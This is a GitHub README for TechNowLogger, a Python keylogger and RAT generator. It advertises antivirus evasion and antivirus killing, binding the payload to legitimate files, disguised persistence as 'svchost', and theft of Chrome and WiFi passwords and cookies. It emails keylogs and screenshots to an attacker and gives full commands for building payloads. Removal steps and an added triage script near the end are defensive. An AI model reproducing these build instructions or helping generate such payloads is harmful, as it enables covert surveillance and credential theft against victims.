  • Stars: 418
  • Rank: 100,378 (Top 3 %)
  • Language: Python
  • License: BSD 3-Clause "New...
  • Created over 4 years ago
  • Updated 6 months ago

Repository Details

Sinister is a Windows/Linux keylogger generator which sends key-logs via email with other juicy target info

TechNowLogger

This small python script can do really awesome work.

TechNowLogger is a keylogger generator for Windows/Linux, written in Python 3, which sends key-logs and screenshots via email along with other juicy target info.

Disclaimer

💻 This project was created only for good purposes and personal use.

THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.

Features

  • Works on Windows/Linux
  • Notifies of a new victim via email
  • Undetectable
  • Persistence
  • Email credentials validation before payload generation.
  • Can receive keylogs at any email provider such as GMAIL, YAHOO, OUTLOOK, or a custom SMTP server.
  • SMTP Server/Port

    Server Name   SMTP Server             SMTP Port
    GMAIL         smtp.gmail.com          587
    OUTLOOK       smtp-mail.outlook.com   587
    YAHOO         smtp.mail.yahoo.com     587

  • Sends a screenshot of the victim PC's screen via email
  • Creates an executable binary with zero dependencies
  • Creates a small (~5 MB) payload with advanced functionality
  • Obfuscates the payload before generating it, hence bypassing a few more antivirus products
  • The generated payload is encoded with base64, which makes it extremely difficult to reverse engineer the payload
  • Function to kill antivirus on the victim PC, which tries to disable the security
  • Awesome colourful interface to generate the payload
  • On the attacker side: while creating the payload, the script automatically detects missing dependencies and installs them
  • Distinguishes log data on the basis of the active window name (check image for better understanding)
  • Able to add a custom icon to the evil file
  • Built-in binder which can bind the keylogger to any file [.pdf, .txt, .exe etc], running the legitimate file on the front end and the evil code in the back end as a service.
  • Checks for an already running instance on the system. If a running instance is found, then only the legitimate file is executed [multiple instance prohibiter to avoid receiving duplicate email logs].
  • The attacker can create/compile for both Windows and Linux using a Linux system, but can only create/compile a Windows executable using a Windows machine
  • Retrieves saved passwords from the victim system and sends them to the attacker.

    The built-in stealer can steal these things:
      - Chrome Browser (Saved Password)
      - WiFi (Saved Password)
      - Chrome Cookies (Login Data, Cookies, History)
      - Firefox Cookies (cookies.sqlite)

    Note: The stealer is custom-coded and does not rely on LaZagne

  • Grabs and sends useful information about the victim's device

    These things are grabbed and sent:
      - Operating System
      - Computer Name
      - User Name
      - Public IPv4

  • If your payload is unable to execute, then specify --debug to run the exe in the foreground with CMD

Important

On 30 May 2022, Google removed the less secure apps feature, so instead of the Gmail password:

  • Enable 2FA on your attacker gmail
  • Create App Specific Password
  • Use that app specific password, while creating payload.
  • How to Create App Specific Password: Click Here

Tested On

  • Kali Linux - ROLLING EDITION
  • Windows 10
  • Windows 8.1 - Pro
  • Windows 7 - Ultimate

Prerequisite

  • Python 3.X
  • Few External Modules

How To Use in Linux

# Navigate to the /opt directory (optional)
$ cd /opt/

# Clone this repository
$ git clone https://github.com/PushpenderIndia/technowlogger.git

# Navigate to technowlogger folder
$ cd technowlogger

# Installing dependencies
$ bash installer_linux.sh

*** Note When The Python Installer DialogBox Appear while executing installer_linux.sh ***
    * Click on custom install 
    * Select Path to : C:/Python37-32
    ### So that the python is installed in this path (Inside Wine) : ~/.wine/drive_c/Python37-32

# If you are getting any errors while executing installer_linux.sh, try to install using installer_linux.py
$ python3 installer_linux.py

$ chmod +x technowgen.py
$ python3 technowgen.py --help

# Making Payload/RAT
$ python3 technowgen.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# Making Payload using GMAIL SMTP Server, Port Configuration (Default SMTP Server = smtp.gmail.com, Default SMTP Port = 587)
$ python3 technowgen.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# Making Payload using OUTLOOK SMTP Server, Port Configuration
$ python3 technowgen.py -e [email protected] -p YourEmailPass -x smtp-mail.outlook.com -y 587 -l -o output_file_name --icon icon_path

# Making Payload using YAHOO SMTP Server, Port Configuration
$ python3 technowgen.py -e [email protected] -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -l -o output_file_name --icon icon_path

Note: You can also use our custom icons from the icon folder, just use them like this  --icon icon/pdf.ico

How To Use in Windows

# Install dependencies 
$ Install latest python 3.x

# Clone this repository
$ git clone https://github.com/PushpenderIndia/technowlogger.git

# Go into the repository
$ cd technowlogger

# Installing dependencies
$ python -m pip install -r requirements.txt

# Open technowgen.py in Text editor and Configure Line 16 WINDOWS_PYTHON_PYINSTALLER_PATH = "C:/Python37-32/Scripts/pyinstaller.exe" 

# Getting Help Menu
$ python technowgen.py --help

# Making Payload/RAT
$ python technowgen.py -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path

# Making Payload using GMAIL SMTP Server, Port Configuration (Default SMTP Server = smtp.gmail.com, Default SMTP Port = 587)
$ python technowgen.py -e [email protected] -p YourEmailPass-w -o output_file_name --icon icon_path

# Making Payload using OUTLOOK SMTP Server, Port Configuration
$ python technowgen.py -e [email protected] -p YourEmailPass -x smtp-mail.outlook.com -y 587 -w -o output_file_name --icon icon_path

# Making Payload using YAHOO SMTP Server, Port Configuration
$ python technowgen.py -e [email protected] -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -w -o output_file_name --icon icon_path

Note: You can also use our custom icons from the icon folder, just use them like this  --icon icon/pdf.ico

How to Update

  • Run updater.py to update automatically, or download the latest Zip from this GitHub repo
  • Note: Git Must be Installed in order to use updater.py

Note:- Evil File will be saved inside dist/ folder, inside technowlogger/ folder

Available Arguments

  • Optional Arguments

    Short Hand           Full Hand                         Description
    -h                   --help                            show this help message and exit
    -i INTERVAL          --interval INTERVAL               Time between reports in seconds. default=120
    -t TIME_PERSISTENT   --persistence TIME_PERSISTENT     Becoming Persistence After __ seconds. default=10
    -x SMTP_Server       --smtp                            Custom SMTP Server. default="smtp.gmail.com"
    -y SMTP_Port         --port                            Custom SMTP Port. default=587
    -w                   --windows                         Generate a Windows executable.
    -l                   --linux                           Generate a Linux executable.
    -s                   --steal-password                  Steal Saved Password from Victim Machine [Supported OS : Windows]
    -b file.txt          --bind LEGITIMATE_FILE_PATH.pdf   AutoBinder : Specify Path of Legitimate file. [Supported OS : Windows]
    -d                   --debug                           Payload Will Run In Foreground with CMD Window, To get Appropriate Execution Error

Note : Either -w/--windows or -l/--linux must be specified

  • Required Arguments

    Short Hand    Full Hand             Description
                  --icon ICON           Specify Icon Path, Icon of Evil File [Note : Must Be .ico]
    -e EMAIL      --email EMAIL         Email address to send reports to.
    -p PASSWORD   --password PASSWORD   Password for the email address given in the -e argument.
    -o OUT        --out OUT             Output file name.

New Screenshots:

Getting Help

Generating payload

Getting report

Log data is distinguished on the basis of the active window name ~ feature added in v1.3 and onward

Retrieves & sends saved Chrome browser passwords

  • Note: In order to use this feature, specify -s or --steal-password while creating the keylogger

Retrieves & sends saved WiFi passwords

  • Note: In order to use this feature, specify -s or --steal-password while creating the keylogger

Also Refer These Old Images

~Old Screenshots:

Getting Help

Running technowgen.py Script

Building Finished

When the keylogger runs, it adds a registry entry to become persistent

Makes a copy of itself and saves it inside Roaming

Typing random text to test the keylogger

Report 1 sent by TechNowLogger

Login facebook ~ Victim

Report 2 - Keylogs of facebook Credentials

Report 3 - With Screenshots

Debug Issues

Try running the offline keylogger to test offline key-log capturing and debug keylogger issues with these commands:

Run test_key.py in both modes [compiled & raw] and figure out what the error is

Run it like this: python test_key.py

Also compile it like this: pyinstaller --onefile test_key.py --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=pynput.keyboard

After running it, start typing something. The result will be displayed on the command prompt every 10 seconds

The offline keylogger's files are present in the TestKeylogger folder

  • If the payload is unable to execute on the victim's system
1. Create a new payload with the --debug flag
2. Run the payload exe through cmd [don't execute the payload by double clicking it]
3. It will now give a more appropriate error in CMD; just put that issue in the Issue section

Removing TechNowLogger in Windows:

Method 1:

  • Go to Start, type regedit and run the first program. This opens the Registry Editor.
  • Navigate to the following path: Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. There should be an entry called svchost. Right click this entry and select Delete.
  • Go to your user path > AppData > Roaming. You'll see a file named “svchost.exe”; this is the RAT. Right click > Delete.
  • Restart the system.

Method 2:

  • Run "RemoveTechnowLogger.bat" in Infected System and then restart the PC to stop the current Running Evil File.

Removing TechNowLogger in Linux:

  • Open Autostart file with any text editor, Autostart File Path: ~/.config/autostart/xinput.desktop

  • Remove these 5 lines:

       [Desktop Entry]
       Type=Application
       X-GNOME-Autostart-enabled=true
       Name=Xinput
       Exec="destination_file_name"
    
  • Note: destination_file_name is the name of the evil file which you gave to your keylogger using the -o parameter

  • Reboot your system and then delete the evil file stored at the path below

  • Destination path, where the keylogger is stored: ~/.config/xnput
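
The indicators from the Windows and Linux removal steps above can be checked read-only before anything is deleted. The script below is an added example, not part of the TechNowLogger repository; it assumes the artifact names are exactly those stated above, and the function names are hypothetical.

```python
"""Triage for the TechNowLogger artifacts named in the removal steps (added example)."""
import os
import sys
from pathlib import Path

RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

def check_run_entries(entries):
    """Flag Run values matching the page: named 'svchost' or launching Roaming svchost.exe."""
    hits = []
    for name, command in entries.items():
        cmd = command.lower()
        if name.lower() == "svchost" or "\\appdata\\roaming\\svchost.exe" in cmd:
            hits.append(f"Run value {name!r} -> {command}")
    return hits

def read_hkcu_run():
    """Read every value under the HKCU Run key (Windows only)."""
    import winreg
    entries = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        for i in range(winreg.QueryInfoKey(key)[1]):
            name, value, _type = winreg.EnumValue(key, i)
            entries[name] = str(value)
    return entries

def check_linux(home):
    """Report the autostart entry and payload path under a home directory."""
    hits = []
    autostart = Path(home) / ".config" / "autostart" / "xinput.desktop"
    if autostart.is_file():
        target = "<no Exec line>"
        for line in autostart.read_text(errors="replace").splitlines():
            if line.strip().startswith("Exec="):
                target = line.split("=", 1)[1].strip().strip('"')
        hits.append(f"autostart {autostart} launches {target}")
    payload_path = Path(home) / ".config" / "xnput"
    if payload_path.exists():
        hits.append(f"payload path present: {payload_path}")
    return hits

if __name__ == "__main__":
    if sys.platform == "win32":
        found = check_run_entries(read_hkcu_run())
        appdata = os.environ.get("APPDATA")  # resolves to ...\AppData\Roaming
        if appdata and (Path(appdata) / "svchost.exe").is_file():
            found.append(f"dropped copy present: {Path(appdata) / 'svchost.exe'}")
    else:
        found = check_linux(Path.home())
    print("\n".join(found) or "no TechNowLogger artifacts found")
```

The genuine Windows svchost.exe lives under System32 and does not start from a per-user Run key, which is why a Run value by that name or a copy in Roaming is worth reporting. The Exec target on Linux varies with the -o name chosen at build time, so the script prints it rather than matching on it.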

Contributors


  • Pushpender Singh 💻
  • Thomas Kunwar 💻
  • krasnova19 💻
  • sarchish5 💻
  • chiragcode11 💻

Contributions of any kind welcome!

NOTE: If you should be on the list of contributors but we forgot you, then do let us know!

TODO

  • Suggest your own feature
  • Add New features
  • Contribute GUI Version
